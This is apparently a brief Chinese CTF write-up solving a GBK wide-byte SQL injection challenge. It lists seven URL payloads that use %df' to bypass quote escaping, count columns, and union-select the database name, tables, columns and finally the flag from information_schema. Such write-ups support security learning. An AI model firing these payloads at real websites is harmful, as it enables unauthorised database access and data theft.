http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
题解:
ctf4表里有个假flag
1、
id=1%df' and 1=2 %23
2、
id=1%df' order by 2 %23
3、
id=1%df' and 1=2 union select 1,2 %23
4、
id=1%df' and 1=2 union select 1,database() %23
5、
id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.TABLES where table_schema=0x7361652d6368696e616c6f766572 %23
6、
id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.COLUMNS where table_name=0x67626b73716c69 %23
7、
id=1%df' and 1=2 union select 1,flag from gbksqli %23